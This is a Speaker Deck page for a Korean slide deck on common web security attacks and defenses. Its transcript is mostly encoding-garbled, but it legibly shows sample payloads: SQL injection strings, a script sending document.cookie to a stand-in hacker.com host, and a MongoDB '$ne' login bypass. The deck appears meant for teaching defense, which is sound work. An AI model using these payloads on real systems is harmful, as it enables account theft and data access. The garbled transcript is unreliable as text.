Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
웹 개발을 위해 꼭 알아야하는 보안 공격
Search
Lee Sun-Hyoup
February 22, 2021
Programming
0
43
웹 개발을 위해 꼭 알아야하는 보안 공격
통신보안
Lee Sun-Hyoup
February 22, 2021
Tweet
Share
More Decks by Lee Sun-Hyoup
See All by Lee Sun-Hyoup
Kotlin Script 활용하기
kciter
0
650
MongoDB 이해하기
kciter
0
660
Other Decks in Programming
See All in Programming
Is Xcode slowly dying out in 2025?
uetyo
1
210
Cline指示通りに動かない? AI小説エージェントで学ぶ指示書の書き方と自動アップデートの仕組み
kamomeashizawa
1
580
CursorはMCPを使った方が良いぞ
taigakono
1
190
Team topologies and the microservice architecture: a synergistic relationship
cer
PRO
0
1.1k
ニーリーにおけるプロダクトエンジニア
nealle
0
580
Azure AI Foundryではじめてのマルチエージェントワークフロー
seosoft
0
140
Systèmes distribués, pour le meilleur et pour le pire - BreizhCamp 2025 - Conférence
slecache
0
110
『自分のデータだけ見せたい!』を叶える──Laravel × Casbin で複雑権限をスッキリ解きほぐす 25 分
akitotsukahara
1
570
NPOでのDevinの活用
codeforeveryone
0
420
VS Code Update for GitHub Copilot
74th
1
420
What Spring Developers Should Know About Jakarta EE
ivargrimstad
0
280
Cursor AI Agentと伴走する アプリケーションの高速リプレイス
daisuketakeda
1
130
Featured
See All Featured
Documentation Writing (for coders)
carmenintech
72
4.9k
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
10
930
4 Signs Your Business is Dying
shpigford
184
22k
Testing 201, or: Great Expectations
jmmastey
42
7.5k
A Tale of Four Properties
chriscoyier
160
23k
The Art of Programming - Codeland 2020
erikaheidi
54
13k
Designing for humans not robots
tammielis
253
25k
Fantastic passwords and where to find them - at NoRuKo
philnash
51
3.3k
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
35
2.4k
The Straight Up "How To Draw Better" Workshop
denniskardys
234
140k
Code Review Best Practice
trishagee
68
18k
Adopting Sorbet at Scale
ufuk
77
9.4k
Transcript
ਢѐߊਸਤ೧ ԙঌইঠೞחࠁউҕѺ 2021. 02. 22 ࢶഈ
য়טݾ ਢࠁউী೧೧ೞҊӝୡҕѺӝߨҗ೧Ѿߑߨਸ೧ೠ
ਢࠁউ ਢࢎஂডਸҕѺೞחӝࣿਤഈਵ۽ ਢಕܳాೞৈ ӂೠহחदझమীӔೞѢաؘఠਬ߂Ҧ৬э೯ਤ݈ܳೠ https://ko.wikipedia.org/wiki/ਢ_೧ఊ
None
ೠࣽрपࣻ۽ࢲ࠺झоݎೡࣻب😨
ցޖনೠҕѺӝߨj 42-*OKFDUJPO 944 $43'"UUBDL 'JMF6QMPBE"UUBDL $PNNBOE*OKFDUJPO #VGGFS0WFSGMPX %JDUJPOBSZ"UUBDL
ࠗחইפ؊ۄبӝୡੋѪ ԙঌইىঠೠ
ঌইঠೞחҕѺӝߨ 4UBSU
42-*OKFDUJPO ↟ࢲߡীࢲप೯غח42-ਸঈਵ۽ਊೞחҕѺ ↟ӝઓ42-ীঈੋ42-ਸੑೠ ↟ؘఠఎஂ ઁ١оמೞ ↟ڦܻݶࢲ࠺झઙܐп
42-*OKFDUJPOࢎ۹
42-*OKFDUJPOࢎ۹
42-*OKFDUJPOߑয ↟42-ীࢲౠ߹ೠܳоחޙܳझாೠ FY =O =U ] j
↟ળ࠺ػࢶਸࢎਊೠ ↟ਃ્ۄ࠳۞ܻ ۨਕীࢲইੜ݄ইળ
42-*OKFDUJPOबച ↟&SSPSCBTFE42-*OKFDUJPO ↟ੌࠗ۞42-ী۞ܳߊࢤदெਗೞחࠁܳஂٙೠ ↟௪ܻޙ୶ஏ %#ݺ ప࠶ݺ١ஂٙоמೞ
42-*OKFDUJPOबച ↟#MJOE42-*OKFDUJPO ↟2VFSZѾҗଵѢਸࠁҊਗೞחࠁо ઓೞחঌࣻ ୶ۿ ↟%# 5BCMFݺਸঌࣻ ↟42-.BQ ex)
SELECT * FROM users WHERE user_id = '1' and substring(database(),1,2)='us'#
42-*OKFDUJPOबച ↟6OJPO42-*OKFDUJPO ↟6OJPOݺ۸ਸਊೞৈࠁܳஂٙೠ ex) SELECT * FROM users WHERE user_id
= '1' or 1=1 UNION SELECT '',id,pw from users#
944 ↟$SPTF4JUF4DSJQUJOH ↟ਢಕীঈࢿझ݀ܳੑೞחҕѺ ↟ࢎਊࠁܳఎஂೡࣻ ↟ڦܻݶ݆Ѫਸח
944ࢎ۹ <script>document.URL='http://hacker.com?'+document.cookie</script> ѱद౸ ਊо Ӗਸ ੍ਸ ٸ ష ఎஂ!!!
944ߑয ↟)5.-ఠ݂ਸೠറ%#ীೠ FY TDSJQU IUNM IFBE NFUB jj
↟݅ডਸਤ೧ۿূ٘ীࢲبఠ݂ೠ
944बച ↟খࢲࣗѐೠߑध4UPSFE944 ↟3FGMFDUFE944 ↟%0.#BTFE944
944बച ↟3FGMFDUFE944 ↟Ѩ࢝য١ਸࠁৈחҔীझ݀ܳबחҕѺ ↟63-ਸࢎਊীѱ־ܰѱٜ݅ݶҕѺࢿҕ https://papago.naver.com/?sk=ko&tk=en&st=<script>…</script>
944बച ↟%0.#BTFE944 ↟%0.ীঈੋझ݀ܳबחҕѺ ↟࠳ۄо೧ࢳೞחױ҅ীࢲߊࢤغחҕѺ
$43'"UUBDL ↟$SPTT4JUF3FRVFTU'PSHFSZ ↟ҕѺоࢎਊܳਊೞৈਢࢎী ਃਸࠁղחҕѺ
$43'"UUBDLࢎ۹ о admin 1q2w3e4r ۽Ӓੋ ਃ ࢿҕ/पಁ ࢿҕ೮ਵݶ
$43'"UUBDLߑয ↟3FGFSSFS$IFDL ↟ೲਊೠبݫੋ݅ਃೲۅೞب۾ࢸ ↟$43'5PLFO ↟ݽٚਃীషਸߊәೞৈࢲߡীࢲѨૐ ↟$"15$)" ↟ࢎۈਃೠѪݏחѨૐ
$PNNBOE*OKFDUJPO ↟গܻா࣌ীࢲࢎਊغחदझమݺ۸ীঈੋ ݺ۸যܳੑೞחҕѺ 8FC4IFMM"UUBDL ↟ࢲߡSPPUӂೠਸஂٙೡࣻ ↟ڦܻݶࢲ࠺झઙܐп
$PNNBOE*OKFDUJPOࢎ۹ )BDLFS UFYUUYUJGDPOGJH system("cat ${var}") FYFDVUF 8FC4IFMM
$PNNBOE*OKFDUJPOߑয ↟оәदझమೣࣻחࢎਊ9 ↟хೠޙܳఠ݂ FY ]
'JMF6QMPBE"UUBDL ↟ঈࢿझ݀ੌਸস۽٘ೞחҕѺ ↟স۽٘റੌਤܳইप೯दఃݶҕѺࢿҕ ↟ڦܻݶࢲ࠺झઙܐп
'JMF6QMPBE"UUBDLࢎ۹ Upload 1 2 Command WebShell
'JMF6QMPBE"UUBDLߑয ↟ഛੌఋੑѨࢎ ↟স۽٘ੌਸդࣻചೞৈ ↟ౠࣻޙоನೣػ҃স۽٘Ә (Null byte Injection ߑয)
+BWBTDSJQU*OKFDUJPO ↟$MJFOU4JEFীࢲ+BWBTDSJQUܳੑदఃחҕѺ ↟܁DPOTPMF١ਸా೧ઑоמೞ ↟$MJFOU4JEFীхೠؘఠܳ֍ਸ҃ఎஂоמ
+BWBTDSJQU*OKFDUJPOࢎ۹
+BWBTDSJQU*OKFDUJPOߑয ↟$MJFOU4JEFূхೠࠁܳ֍ঋח ↟ؘఠਬബࢿѨࢎоਃೠ҃ࢲߡ৬ాनೠ $MJFOUীࢲѨࢎೞݶউػ
%%P4 ↟%JTUSJCVUFE%FOJBMPG4FSWJDF ↟ࢲߡী࠺࢚ਵ۽݆ېਸࠁղחҕѺ ↟ࢲ࠺झо݃࠺غҊ݆࠺ਊࣗݽػ
%%P4ࢎ۹ Zombie PC Traffic
%%P4ߑয ↟ઁੌױࣽೠؘઁੌ݄ӝয۵ ↟ഛоמೠࢲ࠺झҳઑࢸ҅ ↟*1ఠ݂ ↟ࣛܖ࣌ҳݒj
%JDUJPOBSZ"UUBDL ↟ܻࢎী١۾೧֬ޙৌਸঐഐ۽ੑೞחҕѺ ↟#SVUF'PSDFੌઙ
%JDUJPOBSZ"UUBDLࢎ۹ admin apple banana cyber . . . 1q2w3e4r
%JDUJPOBSZ"UUBDLߑয ↟оחޙৌঐഐ۽١۾ޅೞب۾ࢸ ↟"DDPVOU-PDLPVU1PMJDZ ↟GBDUPSੋૐ
3BJOCPX5BCMF ↟೧दೣࣻܳਊೠಣޙਸݽفदெ֬ ↟҅ఎஂറঐഐਗޙਸঌইղӝਤ೧ࢎਊ
3BJOCPX5BCMFߑয ↟4BMUࢎਊ ↟,FZ4USFUDIJOH ↟1#,%' #DSZQU١ঐഐചঌҊ્ܻࢎਊ
.POHP%#*OKFDUJPO ↟42-*OKFDUJPOۢঈੋчਸ֍য %#ܳઑೞחҕѺ ↟ڦܻݶࢲ࠺झઙܐп
.POHP%#*OKFDUJPOࢎ۹ db.collection.find({ "email": "
[email protected]
", "password": password }) db.collection.find({ "email": "
[email protected]
",
"password": { "$ne": "-" }) password = { "$ne": "-" }
.POHP%#*OKFDUJPOߑয ↟ೱਸࣻחޙܳఠ݂ೠ FY \ ^ < >
#VGGFS0WFSGMPX ↟#VGGFS0WFSGMPXܳా೧ܲݫݽܻীӔೞחҕѺ ↟ܲݫݽܻীӔ߂ઁযооמೞӝٸޙীݺ ↟दझమ೧ఊӝߨӝبೞ ↟ڦܻݶࢲ࠺झઙܐп
None